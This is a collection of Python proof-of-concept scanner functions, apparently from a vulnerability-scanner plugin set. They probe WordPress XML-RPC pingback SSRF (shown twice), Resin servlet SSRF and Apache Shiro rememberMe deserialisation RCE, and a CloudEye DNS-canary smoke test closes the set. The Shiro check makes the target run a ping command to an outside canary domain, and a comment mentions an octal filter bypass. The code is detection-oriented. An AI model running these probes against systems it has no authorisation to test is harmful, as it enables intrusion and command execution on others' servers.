示例#1
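def poc(url):
    """Probe a WordPress XML-RPC endpoint for blind SSRF via ``pingback.ping``.

    A pingback whose *source* URL is a freshly generated CloudEye canary
    domain is POSTed to ``/xmlrpc.php``. If the target resolves that canary
    while processing the pingback, it fetched an attacker-chosen URL, i.e.
    the endpoint is usable for SSRF. The HTTP response itself carries no
    usable signal, so detection rests entirely on the out-of-band DNS hit.

    Args:
        url: Target host or URL; ``http://`` is prepended when no scheme is
            given.

    Returns:
        True when the canary received a DNS lookup inside the verification
        window; False otherwise, including when the request or the CloudEye
        lookup fails (best-effort check, never raises for network errors).

    Requires the module-level names ``CloudEye``, ``requests`` and
    ``req_timeout`` (defined outside this block).
    """
    if '://' not in url:
        url = 'http://' + url
    base = url.rstrip('/')
    targeturl = base + "/xmlrpc.php"

    c = CloudEye()
    dst = c.getRandomDomain('wpssrf')

    # Original author's notes on the pingback parameters: the first value is
    # the SSRF target, of the form (http[s]://IP|DOMAIN)[:(80|8080|443)] --
    # only those three ports are accepted; external addresses go through,
    # internal ones are filtered, and octal notation reportedly bypasses the
    # filter for the 10.x range (not exercised here). The second value must be
    # a post URL that exists on the site; "?p=1" fits any install.
    # NOTE(review): the literal starts with a newline plus indentation before
    # the XML declaration, which is not strictly well-formed XML. WordPress'
    # IXR parser tolerates it, but stricter parsers may not -- confirm before
    # reusing this payload elsewhere.
    payload = """
        <?xml version="1.0" encoding="iso-8859-1"?>
        <methodCall>
        <methodName>pingback.ping</methodName>
        <params>
        <param><value><string>http://{target}/</string></value></param>
        <param><value><string>{victim}?p=1</string></value></param>
        </params>
        </methodCall>""".format(target=dst, victim=base + '/')

    header = {'User-Agent': 'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
              'Content-Type': 'text/xml'}
    try:
        # Nothing in the reply distinguishes success; only the DNS hit counts.
        requests.post(targeturl, data=payload, headers=header, timeout=req_timeout)
        hit = c.verifyDNS(delay=3)
    except Exception:
        # Best effort: an unreachable or broken endpoint is a negative result,
        # not a scan-aborting error.
        return False
    return bool(hit)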
示例#2
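def poc(url):
    """Probe Resin for SSRF through the bundled tutorial servlet.

    For each candidate base path yielded by ``iterate_path``, the
    ``jndi-appconfig/test`` servlet is requested with ``inputFile`` pointing
    at a fresh CloudEye canary domain. A DNS lookup of that canary proves the
    server fetched the attacker-supplied URL.

    Args:
        url: Target host or URL; ``http://`` is prepended when no scheme is
            given.

    Returns:
        The first base path (as yielded by ``iterate_path``) that triggered
        the canary, or None when no path did. Request or CloudEye failures on
        one path are treated as "not vulnerable here" and the next path is
        tried.

    Requires the module-level names ``iterate_path``, ``CloudEye`` and
    ``requests`` (defined outside this block).
    """
    url = url if '://' in url else 'http://' + url
    # The original evaluated iterate_path() twice -- once only to print it --
    # which both leaked debug output to stdout and duplicated the work.
    for base in iterate_path(url):
        try:
            c = CloudEye()
            domain = c.getRandomDomain('resin')
            payload = '/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://%s' % domain
            target = base.rstrip('/') + payload
            requests.get(target, timeout=5)
            hit = c.verifyDNS(delay=3)
        except Exception:
            # Best effort per path: a failed request just means "not here".
            continue
        if hit:
            return base
    return None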
示例#3
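def _with_scheme(url):
    """Return *url* with a scheme: bare ``host:443`` becomes https, else http.

    The port is matched as a whole token (``:443`` followed by ``/`` or end of
    string) so that e.g. ``host:4433`` is not mistaken for TLS, which the
    original substring test (``':443' in url``) did.
    """
    if '://' in url:
        return url
    if re.search(r':443(?:/|$)', url):
        return 'https://%s' % url
    return 'http://%s' % url


def poc(url):
    """Check for Apache Shiro ``rememberMe`` deserialisation RCE, out-of-band.

    A payload built by ``generator`` from ``JAR_FILE`` (presumably a serialized
    gadget chain -- not visible here) is sent in the ``rememberMe`` cookie.
    The embedded command pings a fresh CloudEye canary domain, trying the
    Windows form (``-n``) first and the Unix form (``-c``) second. A DNS
    record for the canary proves the target executed the command.

    This is an intrusive check: it executes a command on the target.

    Args:
        url: Target host or URL. Without a scheme, ``https://`` is used when
            the port is 443, otherwise ``http://``.

    Returns:
        ``url`` followed by each resolver address found in the DNS log
        (``" - <ip>"`` per match of ``client (.*)#``), or None when the
        canary was not observed or any step failed.

    Requires the module-level names ``CloudEye``, ``generator``, ``JAR_FILE``
    and ``requests`` (defined outside this block).
    """
    target = _with_scheme(url)
    try:
        cloudeye = CloudEye()
        domain = cloudeye.getRandomDomain('shiro')  # DNS canary for this probe
        # Command the target is asked to run; either ping flavour suffices.
        rce_command = 'ping -n 3 %s || ping -c 3 %s' % (domain, domain)
        payload = generator(rce_command, JAR_FILE)
        requests.get(target, cookies={'rememberMe': payload.decode()}, timeout=10)

        dnslog = cloudeye.getDnsRecord(delay=2)
        if domain not in dnslog:
            return None
        # Resolver addresses, i.e. the target's egress DNS, from the raw log.
        resolvers = re.findall(r'client (.*)#', dnslog)
    except Exception:
        # Best effort: a failed request or CloudEye lookup is a negative result.
        return None
    return ' - '.join([url] + resolvers)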
示例#4
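def poc(url):
    """Probe a WordPress XML-RPC endpoint for blind SSRF via ``pingback.ping``.

    A pingback whose *source* URL is a freshly generated CloudEye canary
    domain is POSTed to ``/xmlrpc.php``. If the target resolves that canary
    while processing the pingback, it fetched an attacker-chosen URL, i.e.
    the endpoint is usable for SSRF. The HTTP response itself carries no
    usable signal, so detection rests entirely on the out-of-band DNS hit.

    Args:
        url: Target host or URL; ``http://`` is prepended when no scheme is
            given.

    Returns:
        True when the canary received a DNS lookup inside the verification
        window; False otherwise, including when the request or the CloudEye
        lookup fails (best-effort check, never raises for network errors).

    Requires the module-level names ``CloudEye``, ``requests`` and
    ``req_timeout`` (defined outside this block).
    """
    if '://' not in url:
        url = 'http://' + url
    base = url.rstrip('/')
    targeturl = base + "/xmlrpc.php"

    c = CloudEye()
    dst = c.getRandomDomain('wpssrf')

    # Original author's notes on the pingback parameters: the first value is
    # the SSRF target, of the form (http[s]://IP|DOMAIN)[:(80|8080|443)] --
    # only those three ports are accepted; external addresses go through,
    # internal ones are filtered, and octal notation reportedly bypasses the
    # filter for the 10.x range (not exercised here). The second value must be
    # a post URL that exists on the site; "?p=1" fits any install.
    # NOTE(review): the literal starts with a newline plus indentation before
    # the XML declaration, which is not strictly well-formed XML. WordPress'
    # IXR parser tolerates it, but stricter parsers may not -- confirm before
    # reusing this payload elsewhere.
    payload = """
        <?xml version="1.0" encoding="iso-8859-1"?>
        <methodCall>
        <methodName>pingback.ping</methodName>
        <params>
        <param><value><string>http://{target}/</string></value></param>
        <param><value><string>{victim}?p=1</string></value></param>
        </params>
        </methodCall>""".format(target=dst, victim=base + '/')

    header = {
        'User-Agent':
        'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
        'Content-Type': 'text/xml'
    }
    try:
        # Nothing in the reply distinguishes success; only the DNS hit counts.
        requests.post(targeturl,
                      data=payload,
                      headers=header,
                      timeout=req_timeout)
        hit = c.verifyDNS(delay=3)
    except Exception:
        # Best effort: an unreachable or broken endpoint is a negative result,
        # not a scan-aborting error.
        return False
    return bool(hit)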
示例#5
#!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
"""
Author: rivir
Date: 2020/2/22
"""
import sys
sys.path.append('../')
from plugin.cloudeye import CloudEye

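def main():
    """Smoke-test the CloudEye client: register a canary, poke it, dump records.

    Issues a single HTTP request to a fresh canary domain (the request itself
    is expected to fail -- the point is the DNS lookup it causes) and then
    prints the verifyDNS/verifyHTTP results followed by the raw DNS and HTTP
    records. ``delay=0`` is passed throughout; presumably that is a wait in
    seconds before polling, so records may not have landed yet -- confirm
    against the CloudEye implementation. This is a manual check, not an
    assertion.

    NOTE(review): ``requests`` is used here but never imported in this file;
    ``import requests`` belongs at module level next to the other imports.
    The original also ran this code at import time and then called an
    undefined ``main()`` from the ``__main__`` guard (NameError).
    """
    c = CloudEye()
    canary = c.getRandomDomain('cdxy')
    try:
        requests.get('http://' + canary, timeout=1)
    except Exception:
        # Best effort: there is no real web server behind the canary, and
        # a failed request still triggers the DNS lookup we care about.
        pass
    print(c.verifyDNS(delay=0))
    print(c.verifyHTTP(delay=0))
    print(c.getDnsRecord(delay=0))
    print(c.getHttpRecord(delay=0))


if __name__ == "__main__":
    main()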